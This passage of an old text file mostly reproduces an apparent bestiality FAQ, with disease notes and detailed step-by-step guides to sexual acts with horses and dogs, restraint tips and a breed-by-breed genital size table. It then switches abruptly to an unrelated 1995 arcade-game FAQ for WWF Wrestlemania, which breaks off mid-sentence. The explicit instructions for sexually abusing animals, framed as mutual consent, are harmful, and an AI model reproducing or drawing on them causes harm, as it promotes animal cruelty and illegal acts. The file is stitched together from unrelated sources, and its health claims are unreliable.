Brucellosis - ------------------ Canine Brucellosis, caused by the bacteria brucella canis, can be trans- mitted to male humans by female carriers during sex. Female canines with CB show a loss of vigor, enlargement of the lymph nodes and, occasionally, the spleen. Commonly, CB will only cause a human male to experience fever symptoms though one case has been documented where CB has caused sterility. Signs of severe infection in human males may include a UTI, scrotal dermatitis, or diminution of the testicles; testicular atrophy. Those showing severe symptoms should consult a physician immediately. 6 - Parasites - --------- Parasites such as tapeworms, hookworms, ringworms, and coccidia may be contracted through sexual contact with an animal. The most common way of contracting parasites from an animal is from oral/anal and genital/anal contact. Animals with parasites may suffer from nausea, listlessness, and increased appetite or thirst. A simple test of the animals' stool done at your local veterinarians will show whether or not the animal has worms. Treatment for both humans and animals is often simple and only involves the taking of medication. ============================================================================ PART 3: How-To (Equines) ============================================================================ [ This section written by Equuinox (equuinox@worf.netins.net) ] ================================ So-o-o-o, maybe you've thought about trying to make it with a stallion...after all, they sure look like a good time. Here's a few tips on how to make the experience more rewarding for both of you. 1) Find a stallion: preferably somewhere where no one will hear him grunting and snorting, and come to investigate...Older stallions are better; they are more sensible, and less likely to spaz out and hurt someone. Don't even bother with the ones who are half-crazy already, they only get worse when stimulated. 2) The Approach: Quietly walk up to about 10' from him and stop. Let him come to you to investigate. Move very slowly, so as not to startle him, and let him sniff you over...gently pet his neck and withers and murmer encouraging words -win his trust-. At this point it is helpful to smell like a mare in heat...it does wonders for their libido. 3) Smell like an estrus mare: Find a mare in heat, usually 5-6 days out of every 21 (i know it aint that easy). Approach as in 2) above...pet her flanks and work your way slowly back to rub her tush, and base of her tail. Watch her ears...if she resents this contact she will flatten them back, and swish her tail...further pursuit could lead to being kicked. If the mare does not seem to object, GENTLY dip a finger into her vulva, getting her natural aroma on your hands...some mares will not cooperate and move away from the contact... remember, that is their choice. If the mare tolerates your advances, continue to massage her privates...if she really responds well (by raising her tail and squatting), you can try...oh, yeah...that's for my followup article soon to come "How to have more fun with your mare" 4) Restraint: yes, it's a good idea. Some studs get overly excited and react by kicking, biting and/or trying to mount you, all of which are no fun unless yer into S and M too...(although a quick nip on the rump can be fun). Take a halter and lead rope and tie him to a stout object using a slipknot...you do know how to tie a slipknot, don't you? If not, see yer local cub scouts for lessons. The reason for the slipknot is to be able to release him instantly if there's a problem. 5) The Rub: Let the stallion smell the nice, fresh mare odor on your hands- he should respond with snorts, whinneys and (hopefully) an erection. Starting with his neck, pet him gently, massaging his withers and slowly working your way back to his belly and privates. Some studs will get kinda twitchy at this point, swish their tails and kick- stay close to his body, and away from his rear to be safe...avoid being mashed into the stall walls by his body. If he starts to act up quit immediately, calm him down, and start again from the beginning of this step. 6) Clean and Jerk: Unless the horse is seeing active service his penis is probably covered with a layer of smegma, dead skin flakes, etc...it doesn't taste great, nor is terribly useful for lubricating purposes. Wash him up with clean water or -gently- rub the accumulations from his shaft. Apply lube.. K-Y works well. I've found its best to rub the shaft till he's fully-erect, then transfer your attention to the head of the penis. Maintaing a steady pressure on the sensitive glans penis, let him do the thrusting...they usually won't come unless they can thrust-meet his strokes with your own movements. Use your own shameless imagination from this point...again being careful of kicks, love-bites, etc. ================================================ 1) Wear steel-toed boots to protect your toes from being stomped on. 2) Most Stallions quickly learn to enjoy this stuff, and will come to bug you for more in the future. If they resent this type of contact, don't try to force it or you risk getting creamed...I've seen 'em kick a stall door clean off its hinges 3) A little lube is helpful...i usually carry a 3:2 mix of KY and water in a contact lens cleaner bottle... a little more discreet than big tubes of KY. 4) DO NOT get under him or stick yer face down there unless you absolutely know and trust him...some stallions will try to lie down on top of you (squii-i-ish!), or kick suddenly and cost you a lot of expensive dental work. 5) Wear a safety helmet- I know it sounds weird, but their hooves are like rocks and can easily crush your skull. A broken head can ruin a friendship, so its a good idea to wear a helmet (of course, if you get caught playing with him you'd look REALLY SILLY wearing a helmet but "better safe than dead" Ialways say). 6) Did he come? Well, when a staliion comes, the tip of his penis (the glans) swells up (flares) into a mushroom shape the size of your fist or bigger... he'll thrust a couple more times then ejaculate 3-4 ounces of semen with enough force to shoot 5 feet. His semen is whitish and runny like eggwhite... do not confuse with pre-ejaculate, which is watery and clear....he will drip copious amounts of this before he comes. NOTE: Those of you into anal/vaginal sex...do NOT attempt to put his penis into you unless you can already accomodate something the size of a human arm and fist...you risk rupture, and peritonitis if he's too big (plus it'd be real hard to explain what happened to the emergency room staff :>) ALWAYS REMEMBER: A stallion is an unpredictable animal...he may be fine one minute, then explode into 1200 pounds of biting, kicking horseflesh. He may be enjoying himself but he doesn't know his own strength and can disable or kill you without meaning to. If you aren't familiar with the proper handling of equines I strongly urge you to find someone who does to help you the first time (I know that's tough to do, but its for both of your safeties). DISCLAIMER: I've been having fun with equines for 14 years, and I've never been hurt badly...just bruises, ya gotta play by their rules...This Guide is not meant to be all-encompassing. The author of this article DOES NOT encourage you the reader to to perform illegal activities (including trespassing) in the pursuit of your pleasure. This article may be freely reproduced as long as I get credit for it. ==================================== Well, maybe you tried the stallion, and mebbe you haven't. This article is for those of you who might be interested in mares, but haven't had the opportunity to make the most out of the situation... 1) Find a Mare: Easier said than done, sometimes! Locate a likely recipient to your advances and get to know her...spend lots of time scratching her withers and tickling her, share breath and build her trust with you-even the most receptive mares won't have anything to do with someone they don't feel at ease with. Get to know her on a more personal level. 2) Determine if she's in heat: Most (not all, but most) mares are totally unreceptive to sexual advances when they are not in estrus. In mares the cycle is 21 days on average...16 out, then 5-6 days in, with the mare getting progressively more "hot" till she ovulates and goes out of heat about 12 hours later. Most mares will not go out of their way to show estrus signs to humans unless already accustomed to sexing with them. The best way to get her to show signs is by exposing her to a stallion or particularly randy gelding. This is caused "teasing" the mare in the breeding business, and is when the stallion does his screaming, snorting, prancing thing to show off...just like many college freshmen. The estrus mare should respond by raising her tail, squatting and emitting a stream of urine. She will also "wink" at you...by contracting her vaginal muscles and exposing her clitoris. Wink...wink...wink. ..you get the idea. The clitoris in the mare looks like a half-dollar-size replica of the stallions glans penis...it is located at the bottom of the vaginal opening. The mare will usually stand quietly in the squatting position until bred. If the mare responds to the stud by laying her ears back, biting, kicking, etc. ..it's a pretty safe bet to say she's not in heat and you should try again later. Since some folks don't have access to stallions, there are some other signs of estrus including: A) Their labia tend to get fuller and looser...if you pull them apart (carefully, don't get kicked!) you will see that the vaginal lining is cherry-red, in contrast to its normal ruddy pink color. There will also be greater-than-usual amounts of lubrication present. B) The cervix is loose and drapes down in folds when in estrus...when not, it's tight and budlike in appearance... (this one's no good unless you have access to and know how to use a vaginal speculum...ask yer vet to show you a cervix sometime... it looks like a little pink flower). C) Some inexperienced mares will even respond to a human's advences if you can role-play well...sniff at her rump, snort, "bite" her flanks by pinching gently (or just go on ahead an' bite her!), tickle her and massage her external genitalia...mebbe gently insert a finger or three...if she responds, then she's ready -if she puts up a fuss or tries to walk away then leave her be. She's obviously not interested, and further attention of that nature will probably just piss her off and make her resent future advances. However, if she seems to like what's going on you may then... 3) Proceed with Caution: Lube up and. using your fingers, tongue or any other portion of your anatomy that feels good to you both, proceed to pleasure her... move in and out of her with deep, slow strokes. I have noticed that the "hot spot" in mares is not the clitoris, but about 2-3 inches in on the bottom wall of the vagina just anterior (towards her head) to the urethral opening- they respond very favorably to massage there. It is possible to (gently!) insert your arm into her and slowly fist her, feeling how beautifully warm, soft and slippery her pussy is (my mare LOVES this). When they are ready to be bred they will usually be quite loose inside, and it's possible to reach all the way to the back wall of the vagina and her cervix. As you stimulate her she will then begin to slowly clamp down on your arm with her vagina. Move with the contractions and you will find her squeezing harder and harder as she approaches orgasm (yes, contrary to some studies I've read, mares DO experience orgasm, and how!). She will often squeeze with enough force to push your arm right back out...don't try to jam it back in or you could injure her...just continue to use your hand to massage the vestibule of the vagina as she contracts harder and harder. At this point my mare will usually begin to grunt in time to the contractions (sounds like OOOF!) until her climax is over, then she will pull away. Maregasm is usually accompanied by a stream of urine and natural lubricants, so be careful not to get soaked unless you're also into water sports. *Personal note for the morbidly curious* I usually work my mare with my hand to the point where she starts to contract, then climb on up and use my penis to finish the job...it feels great when they clamp down...they have amazing muscle control. When they are done coming they will usually pick themselves up and move away for a bit, then be ready to go again in five minutes or so. I have whiled away many a happy hour bringing my mare to orgasm over and over...they have incredible stamina and it's fun for both of us. When you're both done, give her a pat on the neck, thank her and talk nice to her- don't just take what you want and leave...cuz if yer nice she'll remember you and be even more receptive next time. ==================================================== 1) Wear heavy boots to protect your toes. 2) Keep in close to her body...if she decides to kick you'll be harder to hit, and you can feel her tense-up before she decides to let ya have it. 3) It's a _real_ good idea to wash your hands and the mare's pubes before you go putting things into her...dirt/feces can carry bacteria that can cause her some real problems...use a mild soap like Ivory(tm) Liquid, and plenty of clean water to rinse...most mare's natural defenses can take care of the problem on their own, but there's no sense taking risks with her health if they can be avoided. 4) File your fingernails short n' smooth...a mare's vagina is very delicate, and it's easy to injure her if you're not careful. Don't put any foreign objects in her, either...no carrots or anything like that! 5) NEVER, EVER stick anything into/through her cervix- you can give her a nasty uterine infection, and if she=D5s pregnant breaking the cervical plug means a high probability of aborting the foal, as well as complications for the mare. 6) In the Northern Hemisphere about 90% of mares will go completely out of heat between the months of Nov-Mar. This is called seasonal anestrus, and is a natural response to a decreased photoperiod. Putting them under artificial lighting can help hasten return to normal estrus cycles...there are a number of good texts on the subject. 7) Oh, yeah...If she's a big mare, you will need a bucket or stool to stand on. ..of course, you knew that :>) *dodges thrown tomatoes* 8) Be careful not to get hurt...horses can be unpredictable. DISCLAIMER: This Guide is not meant to be all-encompassing...Mail me if you have questions. ..The author of this article DOES NOT encourage you, the reader to perform illegal activities (including trespassing) in the pursuit of your pleasure. BE SAFE--BE CONSIDERATE--HAVE FUN ============================================================================ PART 4: HOW-TO CANINE ============================================================================ ----------------------------------------------- 1 - Getting Started - --------------- The female dog normally comes on her first heat between the ages of nine and fifteen months. Attempting intercourse with her at this time is not recommended since these changes in her biochemistry are confusing enough without having you trying to do wierd things to her. I would strongly suggest waiting until her second heat if all appears normal. 2 - The right bitch for you - ----------------------- As a rule of thumb, a dog the size of your average German Shepherd Dog is large enough to comfortably accomodate your average sized human male. However, this is not always true. I will go into further detail about signs of discomfort and warning signs later. Saint Bernards, Great Danes, Newfoundlands and other huge breeds should have no problems accomodating a human male. 3 - Prepararation is the key! - ------------------------- In preparing to have sex with your dog, you'll need to run down to the local drug store and pick up a few things. Namely; KY Jelly, (do NOT use a petro- leum or oil based lubricant.). Wet and Astro Glide, both of which can be found at your local adult shop, work as well. Also, if you're near a medical or veterinary supply, surgical lubricants are good too; latex gloves. If you're going to be messing around with a stray dog or a dog you do not own it doesn't hurt to rubber up! You can get infections or a fever from bitches with vaginal infections or brucellosis, (see the Health section of the F.A.Q. for more information on this topic); condoms. If sharing a dog or picking up a stray, protect yourself. Although dogs do not carry AIDS, it has been theorized that the virus could survive long enough inside a bitches' vagina long enough for you to contract it, or anything else, if you have sex with her immediately after an infected person. Remember also that if she has a yeast or bacterial infection, you could get it too; surgical soap. If you know the bitch is in good health and you'd like to insert whatever strikes your fancy into her, I recommend you clean it thoroughly. A bitches' vagina is a very vascular area and, especially when in heat, is quite susceptable to infection; nail clippers. Nails could carry dirt on them or scratch the delicate inner lining of a bitches' vagina. Cut them nails down and file them. You'll also look stunning with your new manicure :); and lastly, MilkBones! Buy these with everything else if you really want to squick the counter people :) 4 - In the trenches - --------------- Once you've got your bitch and your supplies, it's time to get to work. I do not suggest attempting sex with a bitch out of season, especially if she is not your dog. You may wind up getting bit, which may mean changing your name to John Wayne Bobbitt. A bitch in heat is your best bet, but just because she's wet and smells nice doesn't mean she's 'in the mood.' How can you tell if she's in the mood? Check the discharge. The discharge of a bitch in 'Standing Heat' should be pinkish / creamy white. This cycle lasts for between seven and nine days and is in the middle of the complete heat cycle. If the discharge is a dark, blood red, she's just coming into or going out of heat. It never hurts to try but DO NOT force her. She may say no the first time. Bitches are known to tease and may jump forward or fall over in front of you. However, if she reacts hostily to you, STOP IMMEDIATELY. Definate signs that a bitch is receptive are; Flagging--raising of the tail over the back exposing the genitals, Soliciting--rubbing her butt in your crotch, sitting on your face, etcetera, and Play Posing--being excessively playful, jubilant, etcetera. Once you're both consenting, you may consider some foreplay. Fingering her will bring you both hours of joy and amusement :) The bitches' "clitoris" is located about 3/4-1" (in large breeds) into the vagina. The clitoral ridge is fairly prominant so easy to find. Rubbing this will cause her to start thrusting and she'll love you for every moment of it. If she's your dog or if you're certain she's healthy, you may want to engage in some 'puppylingus.' Most bitches have a bitter-sweet taste when in standing heat and I definately recommend the aroma. With all teasing done, it's time to start your engines! The vagina of a female dog takes a sharp turn upward so you will have to enter from a seventy-five to eighty degree angle. The average body temperature of a dog is 101-102 degrees Fahrenheit so expect her to very hot and moist. I don't believe I need to tell you what to do from here on in . Enjoy! 5 - Out of heat and spayed bitches - ------------------------------ If the bitch is your own you may want to try her out of heat. The same rules apply except be sure and use an excessive amount of lube and be very careful. You can do a lot of damage if you try and force her and that'll be a difficult one to explain to the vet. Most spayed bitches cannot have intercourse because of the removal of their reproductive organs. They do not come into heat and very few show interest in sex. You can try 'fingering' a spayed bitch of 'puppylingating' her but intercourse is strongly advised against unless you have extensive experience. 6 - Anal Sex - -------- The same rule of thumb for size applies to anal sex as well. There are some dogs that like anal sex, others that tolerate it, and those that can't stand it. Most dogs will not be immediately comfortable with anal sex but if you choose to continue, instructions on how to do so follow. If your dog reacts with an expression of pain or anger, STOP IMMEDIATELY. Your dog is not suited for anal intercourse. Start by touching the anal area of your dog and let them get comfortable with it. Do not dive right in and insert anything. Wait until they freely alow you to touch under their tail. Be patient. While touching around their tail, wear gloves. Numerous worms and bacteria which can cause a variety of illnesses can be found in dog feces. NEVER MAKE ORAL CONTACT WITH A DOG'S ANUS. The result could be a nasty infection or a case of tape, ring, or hookworms, among others. Once your dog is comfortable with you feeling around their anus, try inserting a VERY well lubricated, gloved finger. Do this over and over again until your dog seems comfortable with it. Once again, if your dog seems to be in pain or react violently, STOP and DON'T try again. Gradually increase the number of gloved, well lubricated fingers you use until the number of fingers inserted comfortably represents the width of your penis. You may then attempt anal intercourse with your dog. Remember; 1.) Not every dog enjoys anal sex. The majority do not, 2.) Always rubber up and never have oral contact with the anus and 3.) STOP IMMEDIATELY if your dog shows signs of pain or discomfort. If you notice worms in your dog's stool, bring your dog to the vet with a stool sample. Merry Matings! -------------------------------------------------- There are three types of sex possible with male dogs to be covered in this FAQ; anal, oral and docking. 1 - Anal sex with dogs; On the receiving end - ---------------------------------------- Most male dogs are more than happy to mount you and "fuck you silly." Some are less enthusiastic than others. There are dangers to being mounted by a male dog though. First, one must understand the anatomy of the male canine reproductive system. A dog's penis is unlike that of a human's. The appearance, texture and sensitivity are much different. Working from the tip back, the end of a dog's penis is somewhat blunt with a slight angle. It typically swells to it's greatest shaft width along the first 2/5 then gradually tapers until you reach the bulb at the base of the exposed, unsheathed penis. The bulb, (bulbous glandis) is a large swelling at the base of the penis which consumates the tie between a bitch and a dog during sex. On a German Shepherd Dog, it's normally about three to three and a half inches wide, a plenty good handful for most. If you're going to have sex with a male dog, the bulb and the Os Penis are your main concerns. The Os Penis is a bone inside the shaft of a dog's penis. If he gets overly excited and starts thrusting rapidly, you could get jabbed with it and, if you do, trust me, you won't sit comfortably for days. If you allow a dog to mount you there is a definate chance that you may tie with him--that the bulb, (also known as the knot) will swell inside of you and keep you two stuck together. If you do not prepare yourself, you could be in for fifteen to thirty minutes of agony. Start loosening yourself up using whatever you can fit up your anus. Graduated dildos work very well and are available at most adult stores. Wait until you are comfortable with at least a three inch circumference before taking on a dog. To get a dog to mount you, grasp his sheath gently and start rubbing the base of it, near his ballsac. He should, at that time, start thrusting. Some dogs will try and mount you right then and there. Remember, if it's his first time, he'll need some guidance. Even some old pro's need guidance. If he does not try to get on your back, try pulling him up and jerking him off as he 'stands' behind you. If he does not want to get on your back, try laying on your back, legs hanging off of a couch or bed, and have him lay on top of you, on your belly, and try it that way. Once you've got him to mount you, attempt to guide his penis into you. Remember, if he misses, that os penis can hurt. Once inside of you, you can lave most of what's left up to him. If he ties with you it is imperetive he NOT pull out of you until he starts getting softer. Otherwise, you may have one hell of a story to tell at the Emergency Room! Once tied, the dog will probably try and turn around so that you're butt to butt with him. This is an instinctual behaviour. If he starts trying to pull out or panics, grab whichever legs you can and try and hold him against you so he doesn't pull out. It is a very good idea to have someone else present the first time you tie a dog in case of an emergency. Sit back, enjoy fifteen to thirty minutes of elation, then, once he starts getting softer, let him pull out of you. Do not lick his penis or touch it with your bare hands. Not only will it be very sensitive but there will be bacteria on his penis that can make you ill. However, it will not affect him. For females... The same applies to females for anal and vaginal sex. Those females who have spoken up about vaginal sex with male dogs have both said volumes of praise about their canine companions and stated having little to no problem accomodating the bulb. Some dogs may not want to mount or show an interest in mounting. Others will never tie, only sit inside of you. There are also dogs that don't turn when they are, or are not, tied. It all depends on the individual dog. 2 - Anal sex with dogs; Giving - -------------------------- The same written in the section on bitches applies to dogs. Refer to Anal Sex (Number Six) above for further information. 3 - Oral sex with dogs; On the receiving end - ---------------------------------------- Some dogs are natural born lickers and will lick anything and keep licking until whatever their licking is raw. Others will never lick anything in their lives. Once again, dogs as individuals will each act differently in different situations. The best way to find out how your dog will react is to give it a shot. If your dog is not too enthusiastic about licking, try using gravy, peanut butter or any other treats you dog might enjoy. DO NOT use chocolate based products or chocolate as large amounts of chocolate can be toxic for dogs. Both males and females alike have testified to the pleasures to be derived from oral sex with dogs. 4 - Oral sex with dogs; Giving - -------------------------- A dog's penis is very sensitive so be careful when handling it. When exposed, the penis is prone to dry out if not constantly wet. Spit works well. Try and avoid smeering it on with your hand. Using your tongue is much more fun anyways :) To get a dog aroused, use the same process as described above. Grasp the sheath near it's base, close to the dog's ballsac, and start rubbing rapidly. You will be able to feel the bulb become more defined within the sheath and you must pull the sheath back before it get's too large to fit out the slit. Otherwise, your dog will be uncomfortable until his erection subsides. When thrusting, you can either take the dog's penis into your mouth or coninue to rub beind the knot. You must be very careful if you choose to take the dog's penis into your mouth, remembering how sensitive it is and keeping him from scraping his member on your teeth. Once fully erect, experiment! Most dogs will just stand and pant away happily as you lick, suck, or rub their cocks. Expect him to stay hard for five to fifteen minutes on average. Dog cum is quite tasty, usually bitter sweet, and continues to shoot from the time he's about half hard and coming out of his sheath to the time when he starts going back into his sheath. Refer to the chart below for semen volume counts. 5 - Oral sex with dogs; Neutered males - ---------------------------------- Most neutered males lack any interest in having sex. Some are capable of maintaining a half-erection for a short period of time and ejaculating prostatic fluid. If you encounter a neutered male and try masturbating him, stop if he seems uncomfortable. Some will be, some won't be, but don't expect a neutered male to behave like an un-neutered male. He won't. 6 - Docking - ------- Docking is the insertion of the penis into the sheath or muzzle of a dog. Once again, tolerance to these activities all depends on the dog. I normally strongly discourage docking muzzles. It is exceptionally danger- ous and could result in some hard to explain hospital visits. If docking the sheath, see how your dog reacts to having a well lubricated finger stuck in his sheath. If he doesn't seem to mind, try inserting several well lubricated fingers, one at a time, until you've adequately represented the width of your own penis. If he continues not to mind, you can try inserting your penis into his sheath. Be sure and use plenty of lube. You may want ot flush his sheath first with a water enema or a douche. There are a number of dead skin cells and bacteria inside the sheath which could cause urinary tract or other types of infections. Merry Matings! 7 - What does dog semen have in it? - ------------------------------- [ This section compiled by Dogzoo (dogzoo@teleport.com) ] Volume;============================ 7-10 cc with a variation from 0.5 to 20cc Water percentage;=========== 97% (highest of animals) vs. man at 90% (lowest) Contents; Ash, protein, lipids, potassium, sodium, calcium, magnesium, phosphorus, iron, chlorides, sulphur, amino acids, albumins, proteoses, nucleoproteins, mucin, albumoses, fat globules, thiamin, riboflavin, pantothenic acid, niacin, ascorbic acid, (Vitamin C) enzymes and fructose. Prostate fluid is highly alkaline, which neutralizes acids in the bitches' vagina. Naturally, larger dogs produce more semen than smaller breeds. Reference; "Vet obstetrics and genital diseases," S. Roberts, Edwards Brothers Publishing 8 - How large is a dog's penis? - --------------------------- [ This section compiled by Doglover (doglover@gears.efn.org) ] Breed________________Useable Length (inches)________________Diameter (inches) Cocker Spaniel====== 2.0-3 ================================ 0.5-1 Greyhound=========== 2.5-3 ================================ 0.5-1 Bulldog============= 2.5-5 ================================ 1 Dalmatian=========== 3-4.5 ================================ 1 Collie============== 4-5 ================================= 1 Labrador============ 4-6 ================================== 1 Irish Setter======== 4-6 ================================== 1 German Shepherd===== 5-7 ================================== 1.5 Great Dane========== 5-7 ================================== 1.5 Saint Bernard======= 7-9 ================================== 1.5-1.75 Mastiff============= 7.5 ================================== 1.5-1.75 ------------------------------------------------------------------------------- THE WORLD WRESTLING FEDERATION AND MIDWAY PRESENTS... W R E S T L E M A N I A ____ __ _______ ____ __ _______ ____ __ _______ \ \ \ / \ / _____/ \ \ \ / \ / _____/ \ \ \ / \ / _____/ \ \ \/ /\ \/ /____ \ \ \/ /\ \/ /____ \ \ \/ /\ \/ /____ \ \ / \ / ___/ \ \ / \ / ___/ \ \ / \ / ___/ \ \/ /\ \/ / \ \/ /\ \/ / \ \/ /\ \/ / \__/ \__/ \__/ \__/ \__/ \__/ ------------------------------------------------------------------------------- The World Wrestling Federation and the WWF are registered trademarks of Titan Sports. Version 3.1 FAQ. Last modified on August 16th, 1995. *************************************** *** T A B L E O F C O N T E N T S *** *************************************** "I can't believe what I just saw!" DISCLAIMER ....... "Is that legal?" WHAT'S NEW ....... "What a ripoff!" INTRODUCTION ..... "Anything can happen here in the World Wrestling Federation" CHARACTER PROFILES "It's a total debacle!" CONTROLS ......... "Somebody call security!" BASIC MOVES ...... "I think he's cheering for me, McMahon!" CONCEPTS ......... "He can't get up from that!" FEATURES ......... "I can't believe he pulled that off!" BUGS ............. "What a moron!" RUMOR MILL ....... "I'd hate to be on the receiving end of that one!" THROWS ........... "He got exactly what he deserves!" REVERSING THROWS . "Wait a minute!" "Quick reversal!" COMBOS ........... "Incredible combination move!" STRATEGIES ....... "Un-be-liev-able!" CHARACTERS ....... "He can't get away with that!" DESIGNERS ........ "Put 'er there, pal!" CONCLUSION ....... "Aw, that was cheap!" CREDITS .......... "This is a complete disaster!" *************************** *** D I S C L A I M E R *** *************************** "Is that legal?" This document is copyrighted and can be distributed free of charge. This document is not to be sold for profit nor to be printed for sale without the expressed, written consent from the author. If distributed, please indicate credit where credit is due. Any infringements upon this agreement will result in libel and legal actions may be sought. Electronic Gaming Monthly (EGM), are you listening? ************************** *** W H A T ' S N E W *** ************************** "What a ripoff!" This game was released nationwide on July 28, 1995 (dedicated) and is now beginning to slowly appear across the country. Lots of new things have been found including the following: * Fatalities!! The Undertaker has a fatality! * More info on charging up your combo meter! * Bigger, better combos! * Strategies on how to win at WWF! * Correction on who really is Doink ******************************* *** I N T R O D U C T I O N *** ******************************* "Anything can happen here in the World Wrestling Federation!" There are (only) 8 characters to choose from. They are as follows: 1) Doink The Clown 2) Razor Ramon 3) The Undertaker 4) Yokozuna 5) Shawn Michaels 6) Bam Bam Bigelow 7) Bret "The Hit-Man" Hart 8) Lex Luger Yes, I am also aware that other wrestlers should have made this game. Big Daddy Cool Diesel, The 1-2-3 Kid, Jeff Jarrett, and Sid are a few that come to mind. Any of these over Doink, no doubt. But, hey, I don't call the shots, and when the game was in development, I wsa informed that these were the top wrestlers at the time or so the programmers thought. The character selection screen is as follows: /---------------------------------\ | | | | Doink | Razor Ramon | | | | |---------------------------------| | | | | The Undertaker | Yokozuna | | | | |---------------------------------| | | | | Shawn Michaels | BamBam Bigelow | | | | |---------------------------------| | | | | Bret Hart | Lex Luger | | | | \---------------------------------/ Also as with the Mortal Kombat series, random select is Up+Start. It says at the top, "CALLA RANDPER" short for call a random person, I suppose. It would seem to make better sense if it said "RANDOM SELECT" or something more understandable. You can also do a manual palette swap. To change color for your character, hold the joystick to the left or right (depending on which character you choose) and hit one of the buttons other than block. If you choose Doink, The Undertaker, Shawn Michaels, or Bret Hart, you hold the stick to the left and hit a button. And with Razor Ramon, Yokozuna, BamBam Bigelow, and Lex Luger, you would hold the stick to the right. I don't have a handy list of all the colors for all the fighters yet, so go play with this one. Not worth my time to record all the colors. ****************************************** *** C H A R A C T E R P R O F I L E S *** ****************************************** "It's a total debacle!" Doink The Clown Real Name: Matt Osborne (original Doink), NOT Ray Lichicelli (current Doink) Height: ??? Origin: ?? Weight: 235 Alias: ?? Razor Ramon Real Name: Scott Hall Height: 6'7" Origin: Miami, FL Weight: 270 Alias: The Bad Guy The Undertaker Real Name: Mark Callaway Height: 6'11" Origin: Death Valley, CA (naturally) Weight: 328 Alias: ?? Yokozuna Real Name: Rodney Anoia Height: 6'1" Origin: The Polynesian Islands Weight: 600+ Alias: that really big guy :P Shawn Michaels Real Name: Michael Hickenbottom Height: 6'2" Origin: San Antonio, TX Weight: 230 Alias: The Heartbreak Kid Bam Bam Bigelow Real Name: Scott Bigelow Height: ?? Origin: Asbury Park, NJ Weight: 400 Alias: ?? Bret Hart Real Name: Bret Hart Height: ?? Origin: Calgary, Alberta (Canada) Weight: 240 Alias: The Hitman Lex Luger Real Name: Larry Pfohl Height: ?? Origin: Atlanta, GA Weight: 265 Alias: Made in the USA *********************** *** C O N T R O L S *** *********************** "Somebody call security!" .----. .----. | P | | PP | \ ^ / `----' `----' \ | / .----. <- joy stick -> | BL | / | \ `----' / V \ .----. .----. | K | | PK | `----' `----' P = punch PP = power punch BL = defense (block) K = kick PK = power kick Also, for your convenience, F = Forward D = Down U = Up B = Back **************************** *** B A S I C M O V E S *** **************************** "I think he's cheering for me, McMahon!" Every character has shared basic moves. Here are the basic crucial moves needed to survive in Wrestlemania. punch: Your basic, normal, punch. If you hit punch repeatedly while you are right next to someone, you will sometimes do a mini combo, which ends with you throwing your opponent. power punch: A more powerful punch. With most of the characters, various extensions to the arm will appear. I will note this in the individual character description. kick: Your basic, normal, kick. You may can do a few mini-combos with this. power kick: A more powerful kick. With most characters, you can also have various extensions similarly to the power punches. run: P+K After executing the run, you hold down the buttons and you can choose which direction to run in (left or right). Much more intuitive than a badly placed run button in another Midway game. Also, any moves done after bouncing off the ropes are considered High Risk, and do double damage. power throw: PP+PK (some characters) Only Bam Bam Bigelow, Lex Luger, and Yokozuna have this throw. This throw can be blocked, but once hit by it, you cannot reverse this. hair grab: PP (near opponents head while on the ground) After doing certain knock down moves, you can pick up your opponent from the canvas and possibly inflict even more damage. grab: FF+PP This is the normal grab. After doing a grab, you have the option of doing a High Risk Move, mini combo, or true combo. This move cannot be blocked, although if done while you are still trying to stand, you will merely get shoved. *After grab is done* High Risk Move #1: FF+PP High Risk Move #2: DD+PK These are reversible moves which inflict 2x damage when performed on your opponent. Other High Risks are available for individual characters, but each one has these motions which result in various moves. hip toss: BB+P This is very key and to get good at this game will require that you use this effectively. This move no longer can be blocked, and once executed, cannot be reversed. All characters have this move. rope toss: BB+PP This move throws them towards the ropes where the opposing character is vulnerable to an open attack until he recovers. This move has its uses here and there for it leaves your opponent running helplessly. More effective if you are in the center of the ring. shove: BL+P This moves shoves a guy away from you. This is quite good for getting people away from you to give yourself a little more space. I'm not sure if it does damage or not to an opponent. I will try to pay more attention next time. turnbuckle leap: Climb up on the turnbuckle. Go ahead, it's fun. While this move cannot be blocked, you can get hit while on the turnbuckle *and* as you come down. A good counter is a power grab. Also, running away from someone leaping from the turnbuckle is a relatively "safe" move. You can also jump on people out of the ring with this, except Yokozuna. You cannot block while on the turnbuckle, and if you are hit, you sometimes gets knocked out of the ring. drop kick: run+PK This move lets you run, then execute a flying attack. This move is quite useful and has a good surprising factor. body dive: run+PP Very useful just like the drop kick. reverse throw: (FF+PP, DD+PK, etc.) Very necessary for surviving in this game. Also, vital for defensive play. You perform a reversal with the same motion as you would execute a High Risk Move after you grab your opponent. We don't suggest spazzing anymore (simply going crazy with buttons and joystick.) The reversals are definitely just a battle to see who pulls off the High Risk joystick movements first. Very intuitive. power up: spin joystick 720 away from opponent Everyone now can power up by spinning the joystick. You can only do it once per match, however. Helps to hold down block. If you do this motion away from you opponent, you will do a taunt. If you do it while being attacked or grabbed, you will simply flash (which is better). After doing this move, if you can attack your opponent within the next 5 seconds, it will do 4x damage with the notable exception of a combo. (doing a combo + 4x damage would be quite unfair). *********************** *** C O N C E P T S *** *********************** "He can't get up from that!" -- Second Wind -- * You must be on the brink of elimination. This means that you must have lost 1 round already if the match is scheduled for 3 falls. If you're up 1 fall to 0 and your opponent pins you, you can't get up. *note*: If the match is for 1 fall (Wrestlemania Challenge), there is no second wind. Why? I don't know. * Your combo meter must be lit. I don't like this requirement too much because after doing a combo, you can hurt yourself because of this. * You must be in the ring. Throwing someone out the ring to kill them is a good thing to do! -- Ring Out -- If you stay out of the ring for too long, you will start losing health. So don't. You only lose health if your opponent remains inside. If you do a basic throw on someone with your back to the ropes, you will heave them right over the ropes! Those funny symbols after a round: After each round in which you do something impressive, you will awarded a skill bonus by the computer. Various bonuses include Perfects, Quick Victories, No Blocking, 2 Round Sweep, etc. These also possibly make the computer harder when you do it to them! *********************** *** F E A T U R E S *** *********************** "I can't believe he pulled that off!" Head-to-Head mode: It's just that. Your basic head to head fighting game setup. The match is scheduled for the best 2 out of 3 "falls" or rounds. Co-op mode: Co-op mode is much better now and can be challenging (depending on your skill level). If you and your partner survive, you get to stay on the machine and fight each other. (good). If you both die, then both of your games are over. (bad). Playing co-op is a risk worthy of taking, however. You must fight all 8 players (dubbed the Wrestlemania Challenge). It can be quite fun. A good tip to fighting co-op mode is to watch your combo meter. Use it often for it builds up very quickly. If one person starts a combo, your partner should start his. Both of you can use the combo meter if you do it simultaneously, so this is key. Another trick is that you can interrupt your playing partner's combo. You can hit the person being comboed (or even hit your partner) and the combo will stop, but the combo meter will still be intact. Playing against the CPU: When you begin playing against the computer, you get the option of striving for the International belt or the Heavyweight belt. I personally think the Heavyweight belt is more fun and much more challenging, but... In both races for the belt, 